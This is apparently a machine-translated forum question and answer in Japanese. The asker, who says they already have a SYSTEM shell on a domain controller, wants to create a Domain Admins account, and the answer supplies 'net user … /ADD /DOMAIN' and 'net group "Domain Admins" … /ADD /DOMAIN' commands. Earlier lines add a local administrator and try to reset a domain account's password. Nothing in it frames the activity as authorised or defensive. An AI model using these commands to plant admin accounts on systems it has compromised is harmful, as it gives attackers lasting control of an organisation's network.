そのため、ボックスに対するNT\SYSTEMアクセス許可を持つプライマリドメインコントローラ(PDC)にシェルをポップしました。次のコマンドを使用してローカル管理者ユーザーアカウントを作成しました。
Net User myname myc0mpl3x password /add
net localgroup adminstrators myname /add
ただし、これにより、ネットワーク全体の悪用がはるかに簡単になるため、ドメイン管理者のアクセス許可が必要です。私はこれが可能であると理解していますが、どのように参照や情報を見つけることができません。
私も使用しようとしました:
dsquery user -samid name.of.dom.acc.i.know | dsmod user -pwd co0mmmpl3xx
アクセス許可があることがわかっているアカウントのパスワードをリセットするには、何らかの理由でシェルがフリーズします。
使ってみます
Net User name.of.dom.acc.i.know c0mpl3dxcfd
しかし、それもよくわかりません。
他にどのようにドメイン管理者権限を持つアカウントを作成できますか(別のアカウントのパスワードを再設定するのではなく、アカウントを作成します)?
コマンドラインから実行できる他の簡単な特権エスカレーショントリックはありますか?
# WINDOWS: Add domain user and put them in Domain Admins group
Net User username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# WINDOWS: Add local user and put them local Administrators group
Net User username password /ADD
net localgroup Administrators username /ADD